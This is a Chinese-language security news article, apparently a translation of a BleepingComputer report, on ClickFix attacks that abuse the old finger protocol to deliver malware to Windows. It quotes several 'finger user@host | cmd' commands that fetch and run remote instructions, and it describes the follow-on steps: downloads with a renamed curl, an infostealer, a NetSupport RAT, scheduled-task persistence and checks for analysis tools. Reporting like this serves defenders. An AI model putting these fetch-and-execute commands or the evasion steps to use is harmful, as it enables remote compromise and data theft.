Finger协议遭滥用 沦为 ClickFix 恶意软件攻击工具

有着数十年历史的finger协议正重新活跃，威胁者借助这一协议获取远程指令，在Windows设备上执行恶意操作。

过去，人们通过Finger协议，在Unix与Linux系统中使用finger命令查询本地及远程用户信息，该命令后续也被加入Windows系统。尽管目前仍受支持，但相较于数十年前的普及度，如今其使用率已大幅下降。

执行finger命令后，会返回用户的基础信息，包括登录名、用户名（若在/etc/passwd中设置）、主目录、电话号码、最后活跃时间及其他详情。

手指命令输出

近期，多起恶意攻击活动开始利用Finger协议，疑似通过“ClickFix攻击”获取指令并在设备上执行。

这并非finger命令首次被如此滥用——早在2020年，研究人员就曾发出警告，指出该命令已被用作“ Living-off-the-Land Binary（ LOLBIN，合法系统工具滥用）”，用于下载恶意软件并规避检测。

finger命令遭恶意滥用

上月，网络安全研究员分享了一个批处理文件。该文件执行后，会运行“finger root@finger.nateams[.]com”命令，从远程finger服务器获取指令，再通过管道符传递给cmd.exe在本地执行。

手指命令输出

目前该服务器已无法访问，但MalwareHunterTeam又发现了更多利用finger命令的恶意软件样本与攻击活动。例如，Reddit平台上有用户近期发文警示，称自己遭遇了一场伪装成验证码验证的ClickFix攻击——攻击者诱导其运行一条Windows命令，以“证明自己是人类”。

尽管目前该服务器已不再响应finger请求，但另一位Reddit用户捕获了此前的输出结果。这类攻击将Finger协议用作远程脚本传输工具：通过运行“finger vke@finger.cloudmega[.]org”命令，将输出结果通过管道符传递给Windows命令处理器cmd.exe。

这一操作会触发获取到的指令执行：创建随机命名的路径，将curl.exe复制为随机文件名，通过重命名后的curl程序从cloudmega[.]org下载伪装成PDF文件的压缩包，并解压出一个Python恶意软件包。

伪装成PDF的档案内容

随后，系统会通过“pythonw.exe __init__.py”命令执行该Python程序。最终执行的指令会向攻击者的服务器回传“执行成功”的确认信息，同时向用户显示伪造的“验证你是人类”提示框。

目前尚不清楚该Python恶意软件包的具体用途，但从一个关联批处理文件可推断，其应为一款信息窃取工具。

安全员还发现了另一项类似攻击活动：通过“finger Kove2@api.metrics-strange.com | cmd”命令获取并执行指令，操作流程与上述ClickFix攻击几乎一致。

finger命令的输出

分析发现，这一攻击手段更为成熟——指令会先检测设备中是否存在恶意软件研究常用工具，若发现则终止攻击。这些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

若未检测到恶意软件分析工具，指令会下载伪装成PDF的压缩包并解压。但与此前不同的是，该压缩包中并非Python恶意软件包，而是NetSupport Manager远程访问工具（RAT）安装包。

NetSupport Manager RAT

随后，指令会配置一个计划任务，确保用户登录时自动启动该远程访问恶意软件。

目前来看，此类finger命令滥用活动似乎由单一威胁者发起，且主要通过ClickFix攻击实施。但鉴于仍有用户持续上当，相关攻击活动需引起高度警惕。

对于防御方而言，阻止finger命令滥用的最佳方式是拦截流向TCP 79端口的出站流量——该端口是Finger协议用于连接守护进程的专用端口。

参考及来源：https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/